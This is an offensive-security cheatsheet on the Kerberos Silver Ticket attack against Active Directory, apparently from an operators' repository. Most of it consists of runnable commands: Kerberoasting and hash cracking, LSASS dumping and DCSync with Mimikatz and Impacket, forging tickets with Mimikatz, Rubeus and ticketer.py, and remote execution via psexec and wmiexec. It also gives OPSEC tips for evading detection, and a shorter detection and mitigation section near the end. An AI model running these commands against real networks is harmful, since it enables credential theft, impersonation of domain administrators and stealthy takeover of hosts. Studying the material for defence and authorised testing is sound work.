daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-12-silver-ticket-attack.md (21036B)


      1 ---
      2 title: "Attack #12 β€” Silver Ticket Attack"
      3 description: "The Silver Ticket attack is the surgical counterpart to the Golden Ticket. Instead of forging a Ticket Granting Ticket (TGT) with the KRBTGT hash (which…"
      4 category: active-directory
      5 subcategory: "Kerberos & Delegation"
      6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "ntlm"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "Hashcat"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/🟠 Attack #12 β€” Silver Ticket Attack.md"
     11 ---
     12 # 🟠 Attack #12 β€” Silver Ticket Attack
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 The Silver Ticket attack is the **surgical counterpart to the Golden Ticket**. Instead of forging a Ticket Granting Ticket (TGT) with the KRBTGT hash (which grants domain-wide access), an attacker forges a **Ticket Granting Service (TGS) ticket** using the **NTLM hash or AES key of a specific service account**. Because service tickets are encrypted and signed with the target service account's secret, the service accepts the forged ticket as legitimate β€” and critically, **the TGS is validated entirely by the target service, not the Domain Controller**. The DC is never contacted, which makes Silver Tickets significantly stealthier than Golden Tickets.
     19 
     20 The forged TGS contains a fabricated PAC (Privilege Attribute Certificate) with whatever group memberships and privileges the attacker specifies. Since the target service trusts the PAC without verifying it against the KDC, the attacker can impersonate any user β€” including Domain Admins β€” for that specific service only. This makes Silver Tickets ideal for **targeted, persistent access to individual services** like CIFS (file shares), MSSQL, HTTP (web services), LDAP, or HOST (PsExec/scheduled tasks).
     21 
     22 ### What You Need to Forge a Silver Ticket
     23 
     24 | Parameter | Where to Get It | Notes |
     25 |---|---|---|
     26 | **Service account NT hash** | Kerberoasting, LSASS dump, DCSync, NTDS.dit | The key that encrypts the TGS β€” this is the core requirement |
     27 | **Service account AES256 key** | Mimikatz `sekurlsa::ekeys`, DCSync | Preferred β€” stealthier, avoids RC4 downgrade detection |
     28 | **Domain SID** | `whoami /user`, PowerView, `Get-ADDomain` | e.g. `S-1-5-21-...` β€” everything before the last RID |
     29 | **Domain FQDN** | `$env:USERDNSDOMAIN`, `ipconfig /all` | e.g. `corp.local` |
     30 | **Target SPN** | `setspn -L <account>`, PowerView `Get-DomainSPNTicket` | e.g. `CIFS/DC01.corp.local`, `MSSQLSvc/SQL01.corp.local:1433` |
     31 | **Target username** | Any valid or fabricated username | The user to impersonate in the forged PAC |
     32 
     33 ### Common Service SPNs and What They Grant
     34 
     35 | SPN Type | Example SPN | What Access It Grants |
     36 |---|---|---|
     37 | **CIFS** | `CIFS/DC01.corp.local` | SMB file share access, `dir \\DC01\C$` |
     38 | **HOST** | `HOST/DC01.corp.local` | PsExec, scheduled tasks, WMI on the target |
     39 | **LDAP** | `LDAP/DC01.corp.local` | DCSync-equivalent β€” replication queries against the DC |
     40 | **MSSQLSvc** | `MSSQLSvc/SQL01.corp.local:1433` | SQL Server access as sysadmin |
     41 | **HTTP** | `HTTP/WEB01.corp.local` | Web application access (ADFS, Exchange OWA, etc.) |
     42 | **WSMAN** | `WSMAN/SRV01.corp.local` | WinRM / Evil-WinRM remote shell |
     43 | **RPCSS** | `RPCSS/DC01.corp.local` | DCOM/RPC access on the target |
     44 
     45 ### Golden Ticket vs Silver Ticket Comparison
     46 
     47 | Aspect | Golden Ticket | Silver Ticket |
     48 |---|---|---|
     49 | **Forges** | TGT (Ticket Granting Ticket) | TGS (Service Ticket) |
     50 | **Key required** | KRBTGT hash | Service account hash |
     51 | **Scope** | Entire domain β€” any service | Single service only |
     52 | **DC contact** | TGS requests still hit the DC | No DC contact at all |
     53 | **Stealth** | Moderate β€” TGS requests are logged | High β€” no KDC event logs generated |
     54 | **Detection** | 4769 without 4768, encryption anomalies | Very difficult β€” no DC-side events |
     55 | **Prerequisite** | Domain Admin (to get KRBTGT) | Any path to the service account hash |
     56 
     57 ### The Full Attack Flow
     58 
     59 ```
     60 1. Compromise a service account hash (Kerberoasting, LSASS dump, DCSync)
     61 2. Identify the target SPN (CIFS, HOST, LDAP, MSSQLSvc, etc.)
     62 3. Collect the domain SID
     63 4. Forge a Silver Ticket offline (no DC contact needed)
     64 5. Inject into current session (kerberos::ptt / Rubeus ptt)
     65 6. Access the target service as the forged user
     66 7. DC never sees the authentication β€” no 4768/4769 events generated
     67 8. Persist until the service account password is changed
     68 ```
     69 
     70 ***
     71 
     72 ## βš™οΈ Prerequisites
     73 
     74 | Requirement | Detail |
     75 |---|---|
     76 | **Service account NT hash or AES key** | Obtained via Kerberoasting (if SPN-registered), LSASS dump, DCSync, or NTDS.dit extraction |
     77 | **Domain SID** | Available from any domain-joined host with low-priv access |
     78 | **Target SPN** | The Service Principal Name of the service you want to access |
     79 | **Network access to target service** | Must be able to reach the service port (445 for CIFS, 1433 for MSSQL, etc.) |
     80 
     81 ***
     82 
     83 ## πŸ› οΈ Tools
     84 
     85 | Tool | Platform | Notes |
     86 |---|---|---|
     87 | **Mimikatz** | Windows | `kerberos::golden` with `/service:` flag β€” forges Silver Tickets |
     88 | **Rubeus** | Windows | `silver` subcommand β€” cleaner syntax, supports AES |
     89 | **Impacket β€” ticketer.py** | Linux | `-spn` flag for Silver Ticket forging; outputs `.ccache` |
     90 | **Impacket β€” secretsdump.py** | Linux | Extract service account hashes via DCSync |
     91 | **Impacket β€” GetUserSPNs.py** | Linux | Kerberoast to obtain service account hashes |
     92 | **CrackMapExec / NetExec** | Linux | `--use-kcache` to authenticate with forged ticket |
     93 
     94 ***
     95 
     96 ## πŸ’» Full Commands
     97 
     98 ### πŸ”΅ Step 0 β€” Obtain Target Service Account Hash
     99 
    100 ```powershell
    101 # ── Kerberoasting β€” crack the service account password hash ──────────────────
    102 # (Most common path to a Silver Ticket β€” requires only domain user)
    103 
    104 # Rubeus β€” request TGS for all kerberoastable accounts
    105 .\Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
    106 
    107 # Crack with hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23)
    108 hashcat -m 13100 kerberoast_hashes.txt rockyou.txt --force
    109 
    110 # ── Direct hash extraction (if you have DA or local admin on the service host)
    111 # Mimikatz β€” dump service account hash from LSASS
    112 privilege::debug
    113 sekurlsa::logonpasswords
    114 # Look for NTLM hash of the service account (e.g. svc_mssql)
    115 
    116 # Or extract AES keys specifically
    117 sekurlsa::ekeys
    118 # Look for aes256_hmac value for the target service account
    119 ```
    120 
    121 ```bash
    122 # ── Linux β€” Kerberoast via Impacket ──────────────────────────────────────────
    123 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \
    124   -request -outputfile kerberoast_hashes.txt
    125 
    126 # Crack the hash
    127 hashcat -m 13100 kerberoast_hashes.txt rockyou.txt --force
    128 
    129 # ── Linux β€” DCSync a specific service account ────────────────────────────────
    130 secretsdump.py corp.local/Administrator:'Password1'@DC01.corp.local \
    131   -just-dc-user corp.local/svc_mssql
    132 
    133 # Extract the NT hash from output:
    134 # corp.local\svc_mssql:1103:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6:::
    135 #                                                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    136 #                                                                This is the NT hash you need
    137 ```
    138 
    139 ***
    140 
    141 ### πŸ”΅ Step 0b β€” Enumerate SPNs for the Target Service
    142 
    143 ```powershell
    144 # Windows β€” multiple methods
    145 setspn -L svc_mssql                      # List SPNs for specific account
    146 setspn -Q */*                             # List ALL SPNs in the domain
    147 
    148 # PowerView
    149 Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
    150 
    151 # Active Directory module
    152 Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | 
    153   Select-Object Name, ServicePrincipalName
    154 ```
    155 
    156 ```bash
    157 # Linux β€” enumerate SPNs
    158 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10
    159 # Lists all kerberoastable SPNs with their service accounts
    160 ```
    161 
    162 ***
    163 
    164 ### πŸ”΄ Mimikatz β€” Forge & Inject Silver Ticket (Windows)
    165 
    166 ```powershell
    167 # ── Silver Ticket for CIFS β€” access file shares on DC01 ──────────────────────
    168 kerberos::golden \
    169   /user:Administrator \
    170   /domain:corp.local \
    171   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    172   /target:DC01.corp.local \
    173   /service:CIFS \
    174   /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    175   /ptt
    176 
    177 # ── Flags explained:
    178 # /user     = username to impersonate (DA or any user)
    179 # /domain   = domain FQDN
    180 # /sid      = domain SID
    181 # /target   = FQDN of the target server hosting the service
    182 # /service  = service type (CIFS, HOST, LDAP, MSSQLSvc, HTTP, etc.)
    183 # /rc4      = NT hash of the service account running the target service
    184 # /ptt      = inject directly into current session
    185 
    186 # ── Silver Ticket with AES256 (stealthiest) ──────────────────────────────────
    187 kerberos::golden \
    188   /user:Administrator \
    189   /domain:corp.local \
    190   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    191   /target:DC01.corp.local \
    192   /service:CIFS \
    193   /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    194   /ptt
    195 
    196 # ── Silver Ticket for HOST β€” enables PsExec / scheduled tasks ────────────────
    197 kerberos::golden \
    198   /user:Administrator \
    199   /domain:corp.local \
    200   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    201   /target:DC01.corp.local \
    202   /service:HOST \
    203   /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    204   /ptt
    205 
    206 # ── Silver Ticket for LDAP β€” DCSync-equivalent without DA ────────────────────
    207 # ⚠️ Requires the DC's machine account hash (DC01$ computer account)
    208 kerberos::golden \
    209   /user:Administrator \
    210   /domain:corp.local \
    211   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    212   /target:DC01.corp.local \
    213   /service:LDAP \
    214   /rc4:<DC01_MACHINE_ACCOUNT_HASH> \
    215   /ptt
    216 # Now you can run: lsadump::dcsync /domain:corp.local /user:krbtgt
    217 
    218 # ── Silver Ticket for MSSQLSvc β€” SQL Server as sysadmin ──────────────────────
    219 kerberos::golden \
    220   /user:Administrator \
    221   /domain:corp.local \
    222   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    223   /target:SQL01.corp.local \
    224   /service:MSSQLSvc \
    225   /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    226   /ptt
    227 
    228 # ── Save to .kirbi file (for later use / transfer) ───────────────────────────
    229 kerberos::golden \
    230   /user:Administrator \
    231   /domain:corp.local \
    232   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    233   /target:DC01.corp.local \
    234   /service:CIFS \
    235   /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    236   /ticket:silver_cifs.kirbi
    237 
    238 # Inject saved .kirbi later
    239 kerberos::ptt silver_cifs.kirbi
    240 
    241 # ── Verify injection ─────────────────────────────────────────────────────────
    242 klist
    243 # Should show a ticket for cifs/DC01.corp.local
    244 
    245 # ── Use the Silver Ticket ────────────────────────────────────────────────────
    246 dir \\DC01.corp.local\C$             # CIFS ticket
    247 psexec.exe \\DC01.corp.local cmd.exe  # HOST ticket
    248 ```
    249 
    250 ***
    251 
    252 ### πŸ”΄ Rubeus β€” Forge Silver Ticket (Windows β€” Modern Approach)
    253 
    254 ```powershell
    255 # ── Silver Ticket with RC4 ───────────────────────────────────────────────────
    256 .\Rubeus.exe silver \
    257   /user:Administrator \
    258   /domain:corp.local \
    259   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    260   /service:CIFS/DC01.corp.local \
    261   /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    262   /ptt /nowrap
    263 
    264 # ── Silver Ticket with AES256 ────────────────────────────────────────────────
    265 .\Rubeus.exe silver \
    266   /user:Administrator \
    267   /domain:corp.local \
    268   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    269   /service:CIFS/DC01.corp.local \
    270   /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    271   /ptt /nowrap
    272 
    273 # ── HOST ticket for remote execution ─────────────────────────────────────────
    274 .\Rubeus.exe silver \
    275   /user:Administrator \
    276   /domain:corp.local \
    277   /sid:S-1-5-21-3878595448-1012506728-1948843120 \
    278   /service:HOST/DC01.corp.local \
    279   /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    280   /ptt /nowrap
    281 
    282 # ── Verify ───────────────────────────────────────────────────────────────────
    283 .\Rubeus.exe triage
    284 klist
    285 ```
    286 
    287 ***
    288 
    289 ### πŸ”΄ Impacket β€” ticketer.py (Linux β€” Forge Silver Ticket)
    290 
    291 ```bash
    292 # ── Forge Silver Ticket for CIFS from Linux ───────────────────────────────────
    293 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    294   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    295   -domain corp.local \
    296   -spn CIFS/DC01.corp.local \
    297   Administrator
    298 # Output: Administrator.ccache
    299 
    300 # ── Forge using AES256 key ────────────────────────────────────────────────────
    301 ticketer.py -aesKey b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    302   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    303   -domain corp.local \
    304   -spn CIFS/DC01.corp.local \
    305   Administrator
    306 
    307 # ── Forge for HOST (PsExec) ───────────────────────────────────────────────────
    308 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    309   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    310   -domain corp.local \
    311   -spn HOST/DC01.corp.local \
    312   Administrator
    313 
    314 # ── Forge for LDAP (DCSync-equivalent) ────────────────────────────────────────
    315 ticketer.py -nthash <DC01_MACHINE_HASH> \
    316   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    317   -domain corp.local \
    318   -spn LDAP/DC01.corp.local \
    319   Administrator
    320 
    321 # ── Forge for MSSQLSvc ────────────────────────────────────────────────────────
    322 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    323   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    324   -domain corp.local \
    325   -spn MSSQLSvc/SQL01.corp.local:1433 \
    326   Administrator
    327 
    328 # ── Set and use the ticket ────────────────────────────────────────────────────
    329 export KRB5CCNAME=Administrator.ccache
    330 
    331 # CIFS access
    332 smbclient.py -k -no-pass corp.local/Administrator@DC01.corp.local
    333 
    334 # Remote execution (HOST ticket)
    335 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    336 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    337 
    338 # DCSync via LDAP Silver Ticket
    339 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local
    340 
    341 # NetExec
    342 nxc smb DC01.corp.local --use-kcache
    343 nxc smb DC01.corp.local --use-kcache -x "whoami /all"
    344 
    345 # MSSQL access
    346 mssqlclient.py -k -no-pass corp.local/Administrator@SQL01.corp.local -windows-auth
    347 ```
    348 
    349 ***
    350 
    351 ### πŸ”΄ Multi-Service Silver Ticket Combo (Full Host Takeover)
    352 
    353 ```bash
    354 # ── To fully own a target host, you often need BOTH CIFS + HOST tickets ──────
    355 # CIFS = file share access | HOST = remote execution
    356 
    357 # Forge CIFS ticket
    358 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    359   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    360   -domain corp.local \
    361   -spn CIFS/DC01.corp.local \
    362   Administrator
    363 
    364 # Use CIFS ticket to upload tools
    365 export KRB5CCNAME=Administrator.ccache
    366 smbclient.py -k -no-pass corp.local/Administrator@DC01.corp.local
    367 # > put mimikatz.exe
    368 
    369 # Forge HOST ticket (same hash, different SPN)
    370 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    371   -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \
    372   -domain corp.local \
    373   -spn HOST/DC01.corp.local \
    374   Administrator
    375 
    376 # Use HOST ticket to execute
    377 export KRB5CCNAME=Administrator.ccache
    378 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    379 ```
    380 
    381 ***
    382 
    383 ## 🎯 OPSEC Tips
    384 
    385 - **Use AES256 over RC4** β€” RC4-encrypted Silver Tickets produce `EncryptionType: 0x17` in local service logs, which is anomalous in AES-only environments; AES256 (`0x12`) blends with normal traffic
    386 - **Target specific services** β€” a Silver Ticket for CIFS on a single file server is far less suspicious than broad access patterns
    387 - **Set realistic ticket lifetimes** β€” default Mimikatz creates 10-year tickets; set to standard 10-hour lifetime to blend in
    388 - **Silver Tickets don't touch the DC** β€” this is your biggest stealth advantage; there are zero KDC-side event logs generated for the forged ticket
    389 - **For LDAP Silver Tickets** β€” you need the **DC's machine account hash** (DC01$), not a user service account; the LDAP service on a DC runs under the computer account
    390 - **Don't generate excessive service tickets** β€” rapid creation of Silver Tickets for multiple services on the same host correlates in endpoint logs
    391 - **Prefer Silver Tickets over Golden Tickets** when you only need access to one service β€” smaller blast radius means less detection surface
    392 
    393 ***
    394 
    395 ## πŸ›‘οΈ Detection β€” Event IDs
    396 
    397 | Event ID | Source | What to Look For |
    398 |---|---|---|
    399 | **4624** | Security Log (Target Host) | Logon Type 3 from unexpected source β€” Silver Tickets bypass the DC, so the logon event only appears on the target server |
    400 | **4634** | Security Log (Target Host) | Logoff after suspicious session β€” correlate with 4624 |
    401 | **4672** | Security Log (Target Host) | Special privileges assigned β€” DA-level access from unexpected user on the target host |
    402 | **4769** | Security Log (DC) | **ABSENT** β€” this is the key indicator; there should be NO 4769 on the DC for a Silver Ticket, because the DC was never contacted |
    403 | **4768** | Security Log (DC) | **ABSENT** β€” no TGT request either; if service access occurs without 4768 + 4769, it's a forged ticket |
    404 
    405 **Primary detection challenge:** Silver Tickets are inherently harder to detect than Golden Tickets because **the Domain Controller is completely bypassed**. The forged TGS is presented directly to the target service, which validates it locally using its own service account key. There are no KDC-side audit events. Detection must rely on **endpoint-level monitoring** β€” looking for service access events (4624 Type 3) on target servers that have no corresponding TGT/TGS request trail on the DC. Microsoft's PAC validation feature (enabled by default since November 2021 patches) adds a server-side check where the service contacts the DC to validate the PAC, which significantly improves Silver Ticket detection.
    406 
    407 ### PAC Validation β€” The Silver Ticket Killer
    408 
    409 ```
    410 # Post-November 2021 Windows Updates:
    411 # - Services now validate the PAC by contacting the DC
    412 # - This means Silver Tickets with fabricated PACs will FAIL on patched systems
    413 # - The DC checks if the user actually has the claimed group memberships
    414 # - This doesn't kill Silver Tickets entirely β€” tickets forged with CORRECT
    415 #   PAC data (real user, real groups) still work
    416 # - But you can no longer forge tickets for fake users or fake group memberships
    417 ```
    418 
    419 ***
    420 
    421 ## πŸ”— Attack Chain Context
    422 
    423 ```
    424 [Silver Ticket] ──→ Targeted Service Access
    425          β”‚
    426          β”œβ”€β”€β†’ πŸ“ CIFS Silver Ticket β†’ SMB file share access (C$, ADMIN$)
    427          β”œβ”€β”€β†’ πŸ’» HOST Silver Ticket β†’ PsExec / scheduled tasks / remote exec
    428          β”œβ”€β”€β†’ 🩸 LDAP Silver Ticket β†’ DCSync equivalent (needs DC machine hash)
    429          β”œβ”€β”€β†’ πŸ—„οΈ MSSQLSvc Silver Ticket β†’ SQL Server sysadmin access
    430          β”œβ”€β”€β†’ 🌐 HTTP Silver Ticket β†’ Web app access (Exchange, ADFS)
    431          β”œβ”€β”€β†’ πŸ”‘ Stealthier than Golden Ticket β€” no DC event logs
    432          β”œβ”€β”€β†’ πŸ”’ Survives: password changes of OTHER accounts
    433          └──→ πŸ’€ Defeated by: service account password rotation + PAC validation
    434 ```
    435 
    436 **The Silver Ticket persists** until the target service account's password is changed. Unlike Golden Tickets (which require KRBTGT reset Γ— 2), a simple password rotation of the compromised service account invalidates all forged Silver Tickets for that service. This is why **Managed Service Accounts (gMSAs)** β€” which auto-rotate passwords every 30 days β€” are the strongest mitigation against Silver Ticket persistence.
    437 
    438 ***
    439 
    440 > βœ… **Attack #12 β€” Silver Ticket complete.**